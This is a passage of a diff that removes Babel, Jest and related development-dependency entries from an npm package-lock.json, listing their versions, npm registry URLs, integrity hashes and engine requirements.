"@babel/helper-plugin-utils": "^7.22.5" - }, - "engines": { - "node": ">=6.9.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0-0" - } - }, - "node_modules/@babel/template": { - "version": "7.22.15", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.22.15.tgz", - "integrity": "sha512-QPErUVm4uyJa60rkI73qneDacvdvzxshT3kksGqlGWYdOTIUOwJ7RDUL8sGqslY1uXWSL6xMFKEXDS3ox2uF0w==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.22.13", - "@babel/parser": "^7.22.15", - "@babel/types": "^7.22.15" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/traverse": { - "version": "7.23.2", - "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.23.2.tgz", - "integrity": "sha512-azpe59SQ48qG6nu2CzcMLbxUudtN+dOM9kDbUqGq3HXUJRlo7i8fvPoxQUzYgLZ4cMVmuZgm8vvBpNeRhd6XSw==", - "dev": true, - "dependencies": { - "@babel/code-frame": "^7.22.13", - "@babel/generator": "^7.23.0", - "@babel/helper-environment-visitor": "^7.22.20", - "@babel/helper-function-name": "^7.23.0", - "@babel/helper-hoist-variables": "^7.22.5", - "@babel/helper-split-export-declaration": "^7.22.6", - "@babel/parser": "^7.23.0", - "@babel/types": "^7.23.0", - "debug": "^4.1.0", - "globals": "^11.1.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@babel/types": { - "version": "7.23.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.23.0.tgz", - "integrity": "sha512-0oIyUfKoI3mSqMvsxBdclDwxXKXAUA8v/apZbc+iSyARYou1o8ZGDxbUYyLFoW2arqS2jDGqJuZvv1d/io1axg==", - "dev": true, - "dependencies": { - "@babel/helper-string-parser": "^7.22.5", - "@babel/helper-validator-identifier": "^7.22.20", - "to-fast-properties": "^2.0.0" - }, - "engines": { - "node": ">=6.9.0" - } - }, - "node_modules/@bcoe/v8-coverage": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", - "dev": true - }, - "node_modules/@istanbuljs/load-nyc-config": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", - "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", - "dev": true, - "dependencies": { - "camelcase": "^5.3.1", - "find-up": "^4.1.0", - "get-package-type": "^0.1.0", - "js-yaml": "^3.13.1", - "resolve-from": "^5.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/@istanbuljs/schema": { - "version": "0.1.3", - "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/@jest/console": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.6.1.tgz", - "integrity": "sha512-Aj772AYgwTSr5w8qnyoJ0eDYvN6bMsH3ORH1ivMotrInHLKdUz6BDlaEXHdM6kODaBIkNIyQGzsMvRdOv7VG7Q==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@types/node": "*", - "chalk": "^4.0.0", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/core": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.6.1.tgz", - "integrity": "sha512-CcowHypRSm5oYQ1obz1wfvkjZZ2qoQlrKKvlfPwh5jUXVU12TWr2qMeH8chLMuTFzHh5a1g2yaqlqDICbr+ukQ==", - "dev": true, - "dependencies": { - "@jest/console": "^29.6.1", - "@jest/reporters": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-changed-files": "^29.5.0", - "jest-config": "^29.6.1", - "jest-haste-map": "^29.6.1", - "jest-message-util": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-resolve": "^29.6.1", - "jest-resolve-dependencies": "^29.6.1", - "jest-runner": "^29.6.1", - "jest-runtime": "^29.6.1", - "jest-snapshot": "^29.6.1", - "jest-util": "^29.6.1", - "jest-validate": "^29.6.1", - "jest-watcher": "^29.6.1", - "micromatch": "^4.0.4", - "pretty-format": "^29.6.1", - "slash": "^3.0.0", - "strip-ansi": "^6.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/@jest/environment": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.6.1.tgz", - "integrity": "sha512-RMMXx4ws+Gbvw3DfLSuo2cfQlK7IwGbpuEWXCqyYDcqYTI+9Ju3a5hDnXaxjNsa6uKh9PQF2v+qg+RLe63tz5A==", - "dev": true, - "dependencies": { - "@jest/fake-timers": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/node": "*", - "jest-mock": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/expect": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.6.1.tgz", - "integrity": "sha512-N5xlPrAYaRNyFgVf2s9Uyyvr795jnB6rObuPx4QFvNJz8aAjpZUDfO4bh5G/xuplMID8PrnuF1+SfSyDxhsgYg==", - "dev": true, - "dependencies": { - "expect": "^29.6.1", - "jest-snapshot": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/expect-utils": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.6.1.tgz", - "integrity": "sha512-o319vIf5pEMx0LmzSxxkYYxo4wrRLKHq9dP1yJU7FoPTB0LfAKSz8SWD6D/6U3v/O52t9cF5t+MeJiRsfk7zMw==", - "dev": true, - "dependencies": { - "jest-get-type": "^29.4.3" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/fake-timers": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.6.1.tgz", - "integrity": "sha512-RdgHgbXyosCDMVYmj7lLpUwXA4c69vcNzhrt69dJJdf8azUrpRh3ckFCaTPNjsEeRi27Cig0oKDGxy5j7hOgHg==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.1", - "@sinonjs/fake-timers": "^10.0.2", - "@types/node": "*", - "jest-message-util": "^29.6.1", - "jest-mock": "^29.6.1", - "jest-util": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/globals": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.6.1.tgz", - "integrity": "sha512-2VjpaGy78JY9n9370H8zGRCFbYVWwjY6RdDMhoJHa1sYfwe6XM/azGN0SjY8kk7BOZApIejQ1BFPyH7FPG0w3A==", - "dev": true, - "dependencies": { - "@jest/environment": "^29.6.1", - "@jest/expect": "^29.6.1", - "@jest/types": "^29.6.1", - "jest-mock": "^29.6.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/reporters": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.6.1.tgz", - "integrity": "sha512-9zuaI9QKr9JnoZtFQlw4GREQbxgmNYXU6QuWtmuODvk5nvPUeBYapVR/VYMyi2WSx3jXTLJTJji8rN6+Cm4+FA==", - "dev": true, - "dependencies": { - "@bcoe/v8-coverage": "^0.2.3", - "@jest/console": "^29.6.1", - "@jest/test-result": "^29.6.1", - "@jest/transform": "^29.6.1", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "@types/node": "*", - "chalk": "^4.0.0", - "collect-v8-coverage": "^1.0.0", - "exit": "^0.1.2", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "istanbul-lib-coverage": "^3.0.0", - "istanbul-lib-instrument": "^5.1.0", - "istanbul-lib-report": "^3.0.0", - "istanbul-lib-source-maps": "^4.0.0", - "istanbul-reports": "^3.1.3", - "jest-message-util": "^29.6.1", - "jest-util": "^29.6.1", - "jest-worker": "^29.6.1", - "slash": "^3.0.0", - "string-length": "^4.0.1", - "strip-ansi": "^6.0.0", - "v8-to-istanbul": "^9.0.1" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "node-notifier": "^8.0.1 || ^9.0.0 || ^10.0.0" - }, - "peerDependenciesMeta": { - "node-notifier": { - "optional": true - } - } - }, - "node_modules/@jest/schemas": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.0.tgz", - "integrity": "sha512-rxLjXyJBTL4LQeJW3aKo0M/+GkCOXsO+8i9Iu7eDb6KwtP65ayoDsitrdPBtujxQ88k4wI2FNYfa6TOGwSn6cQ==", - "dev": true, - "dependencies": { - "@sinclair/typebox": "^0.27.8" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/source-map": { - "version": "29.6.0", - "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.0.tgz", - "integrity": "sha512-oA+I2SHHQGxDCZpbrsCQSoMLb3Bz547JnM+jUr9qEbuw0vQlWZfpPS7CO9J7XiwKicEz9OFn/IYoLkkiUD7bzA==", - "dev": true, - "dependencies": { - "@jridgewell/trace-mapping": "^0.3.18", - "callsites": "^3.0.0", - "graceful-fs": "^4.2.9" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/test-result": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.6.1.tgz", - "integrity": "sha512-Ynr13ZRcpX6INak0TPUukU8GWRfm/vAytE3JbJNGAvINySWYdfE7dGZMbk36oVuK4CigpbhMn8eg1dixZ7ZJOw==", - "dev": true, - "dependencies": { - "@jest/console": "^29.6.1", - "@jest/types": "^29.6.1", - "@types/istanbul-lib-coverage": "^2.0.0", - "collect-v8-coverage": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/test-sequencer": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.6.1.tgz", - "integrity": "sha512-oBkC36PCDf/wb6dWeQIhaviU0l5u6VCsXa119yqdUosYAt7/FbQU2M2UoziO3igj/HBDEgp57ONQ3fm0v9uyyg==", - "dev": true, - "dependencies": { - "@jest/test-result": "^29.6.1", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/transform": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.6.1.tgz", - "integrity": "sha512-URnTneIU3ZjRSaf906cvf6Hpox3hIeJXRnz3VDSw5/X93gR8ycdfSIEy19FlVx8NFmpN7fe3Gb1xF+NjXaQLWg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.11.6", - "@jest/types": "^29.6.1", - "@jridgewell/trace-mapping": "^0.3.18", - "babel-plugin-istanbul": "^6.1.1", - "chalk": "^4.0.0", - "convert-source-map": "^2.0.0", - "fast-json-stable-stringify": "^2.1.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.6.1", - "jest-regex-util": "^29.4.3", - "jest-util": "^29.6.1", - "micromatch": "^4.0.4", - "pirates": "^4.0.4", - "slash": "^3.0.0", - "write-file-atomic": "^4.0.2" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jest/types": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.1.tgz", - "integrity": "sha512-tPKQNMPuXgvdOn2/Lg9HNfUvjYVGolt04Hp03f5hAk878uwOLikN+JzeLY0HcVgKgFl9Hs3EIqpu3WX27XNhnw==", - "dev": true, - "dependencies": { - "@jest/schemas": "^29.6.0", - "@types/istanbul-lib-coverage": "^2.0.0", - "@types/istanbul-reports": "^3.0.0", - "@types/node": "*", - "@types/yargs": "^17.0.8", - "chalk": "^4.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/@jridgewell/gen-mapping": { - "version": "0.3.3", - "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.3.tgz", - "integrity": "sha512-HLhSWOLRi875zjjMG/r+Nv0oCW8umGb0BgEhyX3dDX3egwZtB8PqLnjz3yedt8R5StBrzcg4aBpnh8UA9D1BoQ==", - "dev": true, - "dependencies": { - "@jridgewell/set-array": "^1.0.1", - "@jridgewell/sourcemap-codec": "^1.4.10", - "@jridgewell/trace-mapping": "^0.3.9" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/resolve-uri": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", - "dev": true, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/set-array": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.1.2.tgz", - "integrity": "sha512-xnkseuNADM0gt2bs+BvhO0p78Mk762YnZdsuzFV018NoG1Sj1SCQvpSqa7XUaTam5vAGasABV9qXASMKnFMwMw==", - "dev": true, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/@jridgewell/sourcemap-codec": { - "version": "1.4.15", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.15.tgz", - "integrity": "sha512-eF2rxCRulEKXHTRiDrDy6erMYWqNw4LPdQ8UQA4huuxaQsVeRPFl2oM8oDGxMFhJUWZf9McpLtJasDDZb/Bpeg==", - "dev": true - }, - "node_modules/@jridgewell/trace-mapping": { - "version": "0.3.18", - "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.18.tgz", - "integrity": "sha512-w+niJYzMHdd7USdiH2U6869nqhD2nbfZXND5Yp93qIbEmnDNk7PD48o+YchRVpzMU7M6jVCbenTR7PA1FLQ9pA==", - "dev": true, - "dependencies": { - "@jridgewell/resolve-uri": "3.1.0", - "@jridgewell/sourcemap-codec": "1.4.14" - } - }, - "node_modules/@jridgewell/trace-mapping/node_modules/@jridgewell/sourcemap-codec": { - "version": "1.4.14", - "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.14.tgz", - "integrity": "sha512-XPSJHWmi394fuUuzDnGz1wiKqWfo1yXecHQMRf2l6hztTO+nPru658AyDngaBe7isIxEkRsPR3FZh+s7iVa4Uw==", - "dev": true - }, - "node_modules/@nicolo-ribaudo/semver-v6": { - "version": "6.3.3", - "resolved": "https://registry.npmjs.org/@nicolo-ribaudo/semver-v6/-/semver-v6-6.3.3.tgz", - "integrity": "sha512-3Yc1fUTs69MG/uZbJlLSI3JISMn2UV2rg+1D/vROUqZyh3l6iYHCs7GMp+M40ZD7yOdDbYjJcU1oTJhrc+dGKg==", - "dev": true, - "bin": { - "semver": "bin/semver.js" - } - }, - "node_modules/@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "node_modules/@sinonjs/commons": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.0.tgz", - "integrity": "sha512-jXBtWAF4vmdNmZgD5FoKsVLv3rPgDnLgPbU84LIJ3otV44vJlDRokVng5v8NFJdCf/da9legHcKaRuZs4L7faA==", - "dev": true, - "dependencies": { - "type-detect": "4.0.8" - } - }, - "node_modules/@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "dependencies": { - "@sinonjs/commons": "^3.0.0" - } - }, - "node_modules/@types/babel__core": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.1.tgz", - "integrity": "sha512-aACu/U/omhdk15O4Nfb+fHgH/z3QsfQzpnvRZhYhThms83ZnAOZz7zZAWO7mn2yyNQaA4xTO8GLK3uqFU4bYYw==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "node_modules/@types/babel__generator": { - "version": "7.6.4", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.4.tgz", - "integrity": "sha512-tFkciB9j2K755yrTALxD44McOrk+gfpIpvC3sxHjRawj6PfnQxrse4Clq5y/Rq+G3mrBurMax/lG8Qn2t9mSsg==", - "dev": true, - "dependencies": { - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__template": { - "version": "7.4.1", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.1.tgz", - "integrity": "sha512-azBFKemX6kMg5Io+/rdGT0dkGreboUVR0Cdm3fz9QJWpaQGJRQXl7C+6hOTCZcMll7KFyEQpgbYI2lHdsS4U7g==", - "dev": true, - "dependencies": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "node_modules/@types/babel__traverse": { - "version": "7.20.1", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.1.tgz", - "integrity": "sha512-MitHFXnhtgwsGZWtT68URpOvLN4EREih1u3QtQiN4VdAxWKRVvGCSvw/Qth0M0Qq3pJpnGOu5JaM/ydK7OGbqg==", - "dev": true, - "dependencies": { - "@babel/types": "^7.20.7" - } - }, - "node_modules/@types/graceful-fs": { - "version": "4.1.6", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.6.tgz", - "integrity": "sha512-Sig0SNORX9fdW+bQuTEovKj3uHcUL6LQKbCrrqb1X7J6/ReAbhCXRAhc+SMejhLELFj2QcyuxmUooZ4bt5ReSw==", - "dev": true, - "dependencies": { - "@types/node": "*" - } - }, - "node_modules/@types/istanbul-lib-coverage": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", - "dev": true - }, - "node_modules/@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-coverage": "*" - } - }, - "node_modules/@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "dependencies": { - "@types/istanbul-lib-report": "*" - } - }, - "node_modules/@types/jest": { - "version": "29.5.3", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.3.tgz", - "integrity": "sha512-1Nq7YrO/vJE/FYnqYyw0FS8LdrjExSgIiHyKg7xPpn+yi8Q4huZryKnkJatN1ZRH89Kw2v33/8ZMB7DuZeSLlA==", - "dev": true, - "dependencies": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "node_modules/@types/node": { - "version": "20.4.1", - "resolved": "https://registry.npmjs.org/@types/node/-/node-20.4.1.tgz", - "integrity": "sha512-JIzsAvJeA/5iY6Y/OxZbv1lUcc8dNSE77lb2gnBH+/PJ3lFR1Ccvgwl5JWnHAkNHcRsT0TbpVOsiMKZ1F/yyJg==", - "dev": true - }, - "node_modules/@types/prettier": { - "version": "2.7.3", - "resolved": "https://registry.npmjs.org/@types/prettier/-/prettier-2.7.3.tgz", - "integrity": "sha512-+68kP9yzs4LMp7VNh8gdzMSPZFL44MLGqiHWvttYJe+6qnuVr4Ek9wSBQoveqY/r+LwjCcU29kNVkidwim+kYA==", - "dev": true - }, - "node_modules/@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "node_modules/@types/yargs": { - "version": "17.0.24", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.24.tgz", - "integrity": "sha512-6i0aC7jV6QzQB8ne1joVZ0eSFIstHsCrobmOtghM11yGlH0j43FKL2UhWdELkyps0zuf7qVTUVCCR+tgSlyLLw==", - "dev": true, - "dependencies": { - "@types/yargs-parser": "*" - } - }, - "node_modules/@types/yargs-parser": { - "version": "21.0.0", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", - "dev": true - }, - "node_modules/ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "dependencies": { - "type-fest": "^0.21.3" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "dev": true, - "dependencies": { - "color-convert": "^2.0.1" - }, - "engines": { - "node": ">=8" - }, - "funding": { - "url": "https://github.com/chalk/ansi-styles?sponsor=1" - } - }, - "node_modules/anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "dependencies": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/argparse": { - "version": "1.0.10", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", - "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", - "dev": true, - "dependencies": { - "sprintf-js": "~1.0.2" - } - }, - "node_modules/babel-jest": { - "version": "29.6.1", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.6.1.tgz", - "integrity": "sha512-qu+3bdPEQC6KZSPz+4Fyjbga5OODNcp49j6GKzG1EKbkfyJBxEYGVUmVGpwCSeGouG52R4EgYMLb6p9YeEEQ4A==", - "dev": true, - "dependencies": { - "@jest/transform": "^29.6.1", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.5.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.8.0" - } - }, - "node_modules/babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/babel-plugin-jest-hoist": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.5.0.tgz", - "integrity": "sha512-zSuuuAlTMT4mzLj2nPnUm6fsE6270vdOfnpbJ+RmruU75UhLFvL0N2NgI7xpeS7NaB6hGqmd5pVpGTDYvi4Q3w==", - "dev": true, - "dependencies": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/babel-preset-current-node-syntax": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.0.1.tgz", - "integrity": "sha512-M7LQ0bxarkxQoN+vz5aJPsLBn77n8QgTFmo8WK0/44auK2xlCXrYcUxHFxgU7qW5Yzw/CjmLRK2uJzaCd7LvqQ==", - "dev": true, - "dependencies": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.8.3", - "@babel/plugin-syntax-import-meta": "^7.8.3", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.8.3", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.8.3", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-top-level-await": "^7.8.3" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/babel-preset-jest": { - "version": "29.5.0", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.5.0.tgz", - "integrity": "sha512-JOMloxOqdiBSxMAzjRaH023/vvcaSaec49zvg+2LmNsktC7ei39LTJGw02J+9uUtTZUq6xbLyJ4dxe9sSmIuAg==", - "dev": true, - "dependencies": { - "babel-plugin-jest-hoist": "^29.5.0", - "babel-preset-current-node-syntax": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==", - "dev": true - }, - 